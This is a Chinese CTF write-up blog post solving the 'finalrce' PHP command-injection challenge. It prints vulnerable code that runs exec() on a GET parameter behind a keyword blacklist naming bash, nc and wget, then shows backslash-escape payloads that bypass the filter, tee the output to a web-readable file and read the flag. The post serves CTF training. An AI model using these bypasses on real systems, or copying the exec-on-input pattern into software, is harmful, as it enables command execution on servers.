【2025 SWPU-NSSCTF 秋季训练赛】finalrce

原创 于 2025-11-04 23:19:29 发布 · 334 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #CTF

【实验工具】

Postman或Burp Suite或hackbar

【实验目的】

掌握查看php代码审计能力、正则过滤等

知识点:

1.isset函数详解

https://www.php.net/manual/zh/function.isset.php

2.exec函数详解

https://www.php.net/manual/zh/function.exec.php

3.preg_match函数详解

https://www.php.net/manual/zh/function.preg-match.php

1.开启环境,点击node4.anna.nssctf.cn:28494进入环境

2.进入环境后发现是一道代码审计的题,且根据提示,可能是代码审计结合RCE

3.进行代码分析与审计

<?php
// 使用PHP内置函数highlight_file()高亮显示当前文件(__FILE__)的源代码
// 这通常用于调试或CTF比赛中,让访问者能看到源码
highlight_file(__FILE__);

// 检查是否有通过GET方法传递的'url'参数
if(isset($_GET['url']))
{
    // 将获取到的url参数值赋给变量$url
    $url=$_GET['url'];
    
    // 使用正则表达式对$url进行安全检查,过滤危险命令和字符
    // 正则说明:
    // - 分隔符://
    // - 模式:匹配bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|-|*|"|>|<|%|$
    // - 修饰符:i(不区分大小写)
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        // 如果匹配到黑名单中的命令或字符,输出警告信息
        echo "Sorry,you can't use this.";
    }
    else
    {
        // 如果通过安全检查,输出提示信息
        echo "Can you see anything?";
        
        // 执行系统命令
        // exec()函数会执行给定的$url作为系统命令
        // 这是极度危险的操作,构成了命令执行漏洞
        exec($url);
    }
}

4.注意的点:

1️⃣php脚本中,使用的输出函数是exec,这是无法将输出内容返回到页面的,所以使用将输出复制一份并输出到终端窗口以及写入到名为文本的文件中的方法

2️⃣命令缺失:

缺失很多常用命令:`whoami`、`id`、`pwd`、`curl`、`find`、`grep`等
缺失命令连接符:`|`、`&`、`&&`、`;`、`||`等
缺失通配符:`?`、`[ ]`等

5.构造payload进行攻击

?url=l\s / | tee 1.txt

6.get传参使用该命令:

l\s /部分绕过正则匹配;

|:将前一个命令的输出作为后一个命令的输入;

tee 1.txt:将输出复制一份并输出到终端窗口以及写入到名为1.txt的文件中。

7.访问1.txt

http://node4.anna.nssctf.cn:28494/1.txt

8.使用同原理构造payload获取flag

?url=c\at /flllll\aaaaaaggggggg | tee 2.txt

9.成功访问并拿到flag

http://node4.anna.nssctf.cn:28494/2.txtNSSCTF{8ac38c6b-1252-48ed-a570-3f625997975b}

10.tips:

有一说一,这题目很好,建议4分钟内写完

青鸾-Zero
关注
[SWPUCTF 2024 秋季新生赛]不是哥们ret2text还阴啊?
Welcome To Myon'Blog !
05-26 434
通过分析栈结构发现缓冲区溢出漏洞,其中v1[56]数组可被覆盖。利用逐字节读取特性,先覆盖60字节数据至i变量地址,将其设为0x47。随后继续写入8字节至返回地址处(rbp+8),劫持为后门函数地址0x4011F1。最终成功获取flag:NSSCTF{7256ca63-a417-4a2d-9eb9-49ff78eb65d0}。
[SWPUCTF 2023 秋季新生赛]——Web方向 详细Writeup
Leaf_initial的博客
10-22 2480
来玩贪吃蛇~F12查看源代码,可以看到函数,发现是unicode编码利用网站转换得到flag。
2025 SWPU-NSSCTF 秋季招新入门训练赛(RE方向)
dreamwang12的博客
10-07 2521
本文记录了作者参加NSSCTF2025入门赛的解题过程,共涉及15道题目,包括Xor、Base64、Rc4、UPX脱壳、IDA调试、汇编逆向、Z3求解、Debug调试、虚拟机逆向、Tea/XTea加密、Python逆向、迷宫求解、JS游戏修改等内容。作者通过分析代码逻辑、编写逆向脚本、使用调试工具等方法逐一破解,最终成功获取所有flag。这些题目虽然难度不高,但涵盖了常见的逆向工程技巧,展现了作者在CTF竞赛中的解题思路和技术能力。
NSS-DAY17 2025SWPU-NSSCTF
orchid_sea的博客
08-04 1178
使用绕过:‘‘‘?
WEB-2025 SWPU-NSSCTF部分题解
2401_87876265的博客
09-21 501
摘要:作者分享了在CTF比赛中的四个解题过程:1)通过查看源代码或BurpSuite抓包获取flag;2)修改User-Agent和X-Forwarded-For头信息获取flag;3)使用POST传参执行系统命令查找flag;4)利用空格绕过过滤实现RCE。文章记录了具体解题步骤和知识点,包括HTTP头修改、代码执行等技巧,并提到后续会继续分享其他题解。(149字)
2025 SWPU-NSSCTF 秋季招新入门训练赛(Mobile方向)
dreamwang12的博客
10-06 1078
摘要:NSSCTF2025入门题目解析包含五个方向:1.APK基础题通过分析manifest、资源文件和so库获取flag;2.凯撒加密题需用偏移3位解密;3.So层加密题需逆向x86_64架构so文件并解析base64换码表;4.frida题提供Xposed、smali修改和frida脚本三种绕过密码检测方法;5.so与java交互题通过分析RC4加密流程完成解密。解题涉及静态分析、动态调试和加密算法识别等技能。
2025 SWPU-NSSCTF 秋季招新入门训练赛(MISC方向)
dreamwang12的博客
10-06 413
本文总结了多个CTF隐写术和取证实战的解题思路。主要包括:GIF文件隐写分析、PDF隐写提取、压缩包爆破、图片宽高修改、JWT流量分析、PNG图片LSB隐写、网站木马取证、TTL隐写解密、内存取证等技巧,涉及Stegsolve、wbstego、zsteg等多种工具的使用方法,展示了从文件特征识别到具体解题的完整过程。
2025 SWPU-NSSCTF 秋季训练赛】jicao
欢迎来到我的博客
11-02 853
本文介绍了使用Postman/BurpSuite/hackbar工具进行PHP代码审计的实验过程。实验重点包括:1)理解JSON语法结构及应用场景;2)掌握PHP关键函数如json_decode、$_GET、$_POST的使用;3)分析给定PHP代码逻辑,通过构造特定payload触发flag。成功条件为同时满足POST参数和GET参数,最终获取flag值,实验旨在提升Web安全审计能力,特别是对PHP语言特性与HTTP请求参数处理的理解。
2025 SWPU-NSSCTF 秋季训练赛】gift_F12
欢迎来到我的博客
11-02 806
通过分析前端JavaScript脚本隐藏flag的常见方式,发现flag可能存在于HTML注释、隐藏标签或JS变量中。实验中在倒计时页面的JS源码里找到flag变量"WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}"。最终flag格式为NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft},提示应避免被出题人嘲讽,需积累解题思路。
[2025 SWPU-NSSCTF 秋季招新入门训练赛]easy_sql(超详细)
2502_90815781的博客
10-29 217
爆出两个表名,分别是'test_tb'和'users',猜测flag在'test_db'中,爆字段。发现回显不同,可以得出为字符型注入,且闭合方式为',先查询表的个数。猜测为字符型注入,选择不同的闭合方式,查看回显。报错了,说明没有第四个表,然后查询数据库。数据库名为'tese_db',然后爆表。找到flag,查询flag中的数据。发现参数为wllm,先传个1看看。一上来就是杰哥,先看一下源码吧。回显正确,然后将3改为4,
[2025 SWPU-NSSCTF 秋季招新入门训练赛]ez_sql(超详细)
2502_90815781的博客
10-29 145
可是回显依旧是这个假的flag,所以可以确定是盲注,不过这题会回显错误,所以可以使用报错注入。爆出两个表,分别为'NSS_tb'和'users',猜测flag在'NSS_tb'中,爆字段。传个1后回显发现flag,题目说的一步到位原来是指这个,但明显看出是假的。猜测是字符型注入,选择不同的闭合方式,发现回显结果不同,所以闭合方式为'根据提示可知,使用相对安全的方式传参,即POST传参,且参数为nss。发现疑似flag的字段,'flll444g',查询字段中的数据。发现'and'也被过滤了,依旧双写绕过。
NSSCTF-[青海民族大学 2025 新生赛]wenshilou
2501_91013872的博客
05-29 315
摘要:通过分析JPEG图片文件,使用binwalk工具分离出包含flag的ZIP压缩包。解压后获得Base64编码字符串,经解码得到最终flag为NSSCTF{welcometoQinhaiminzudaxue}。该过程展示了CTF比赛中典型的隐写术解题思路。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8848
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
sharding-jdbc示例代码
12-19
sharding-jdbc示例代码
ENVI+Deep+Learning+V1.0深度学习操作教程
12-19
内容概要:本文介绍了ENVI Deep Learning V1.0的操作教程,重点讲解了如何利用ENVI软件进行深度学习模型的训练与应用,以实现遥感图像中特定目标(如集装箱)的自动提取。教程涵盖了从数据准备、标签图像创建、模型初始化与训练,到执行分类及结果优化的完整流程,并介绍了精度评价与通过ENVI Modeler实现一键化建模的方法。系统基于TensorFlow框架,采用ENVINet5(U-Net变体)架构,支持通过点、线、面ROI或分类图生成标签数据,适用于多/高光谱影像的单一类别特征提取。; 适合人群:具备遥感图像处理基础,熟悉ENVI软件操作,从事地理信息、测绘、环境监测等相关领域的技术人员或研究人员,尤其是希望将深度学习技术应用于遥感目标识别的初学者与实践者。; 使用场景及目标:①在遥感影像中自动识别和提取特定地物目标(如车辆、建筑、道路、集装箱等);②掌握ENVI环境下深度学习模型的训练流程与关键参数设置(如Patch Size、Epochs、Class Weight等);③通过模型调优与结果反馈提升分类精度,实现高效自动化信息提取。; 阅读建议:建议结合实际遥感项目边学边练,重点关注标签数据制作、模型参数配置与结果后处理环节,充分利用ENVI Modeler进行自动化建模与参数优化,同时注意软硬件环境(特别是NVIDIA GPU)的配置要求以保障训练效率。
QPdfiumDemo
12-19
QPdfiumDemo
网络安全竞赛】基于DVWA的代码级攻防技术:SQL注入至RCE利用链的实战设计与自动化防御方案研究
最新发布
12-19
内容概要:本文通过改造DVWA漏洞靶场,构建了一条从SQL注入到文件上传再到远程命令执行(RCE)的完整攻击链,重点展示代码级攻防技术。文中详细解析了二次注入、图片马精制、竞争上传和LD_PRELOAD沙箱逃逸等高阶技巧,并提供了完整的Python利用脚本与官方修复补丁,强调在真实竞赛场景下的实战应用与防御策略。同时展望了自动化Patch评估、微服务漏洞链和合规审计等未来发展方向。; 适合人群:具备一定Web安全基础,参加CTF竞赛或从事渗透测试工作的安全从业者,以及蓝队防守人员和安全培训讲师。; 使用场景及目标:①在高校CTF比赛中作为高难度Web题型,检验选手综合攻防能力;②用于企业招聘中考察候选人实战编码与应急响应能力;③辅助安全培训中进行攻击复现与防御规则编写。; 阅读建议:学习者应结合DVWA环境动手实践每个攻击环节,深入理解Payload构造原理与系统底层机制,同时对比官方Patch掌握安全编码规范,提升攻防双向能力。
量子信息科学入门
12-19
本书全面介绍量子信息科学的核心概念,涵盖量子计算、量子通信与退相干机制。从基本的量子比特出发,深入探讨纠缠、量子门、测量及错误校正等关键技术。结合理论与实验视角,解析量子隐形传态、量子密码学与量子算法的实现原理。书中融合多位领域专家的讲义,兼顾初学者与研究前沿,是进入量子信息技术领域的理想指南。
企业传播全渠道新闻发稿策略与GEO优化效果评估:基于AI驱动的媒体投放及多维度ROI分析系统设计
12-19
内容概要:本文系统阐述了企业新闻发稿在生成式引擎优化(GEO)时代下的全渠道策略与效果评估体系,涵盖当前企业传播面临的预算、资源、内容与效果评估四大挑战,并深入分析2025年新闻发稿行业五大趋势,包括AI驱动的智能化转型、精准化传播、首发内容价值提升、内容资产化及数据可视化。文章重点解析央媒、地方官媒、综合门户和自媒体四类媒体资源的特性、传播优势与发稿策略,提出基于内容适配性、时间节奏、话题设计的策略制定方法,并构建涵盖品牌价值、销售转化与GEO优化的多维评估框架。此外,结合“传声港”工具实操指南,提供AI智能投放、效果监测、自媒体管理与舆情应对的全流程解决方案,并针对科技、消费、B2B、区域品牌四大行业推出定制化发稿方案。; 适合人群:企业市场/公关负责人、品牌传播管理者、数字营销从业者及中小企业决策者,具备一定媒体传播经验并希望提升发稿效率与ROI的专业人士。; 使用场景及目标:①制定科学的新闻发稿策略,实现从“流量思维”向“价值思维”转型;②构建央媒定调、门户扩散、自媒体互动的立体化传播矩阵;③利用AI工具实现精准投放与GEO优化,提升品牌在AI搜索中的权威性与可见性;④通过数据驱动评估体系量化品牌影响力与销售转化效果。; 阅读建议:建议结合文中提供的实操清单、案例分析与工具指南进行系统学习,重点关注媒体适配性策略与GEO评估指标,在实际发稿中分阶段试点“AI+全渠道”组合策略,并定期复盘优化,以实现品牌传播的长期复利效应。
[SWPUCTF 2025 秋季新生赛]ezez_include
11-20
SWPCTF可能是拼写错误,应该是SWPUCTF,因为用户在系统指令中提到过"SWPUCTF 2025秋季新生赛"。 回顾系统指令的示例部分:"### 快速排序",然后有代码块和问题。但在用户查询中,是关于CTF题目的。 我需要确保回答...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值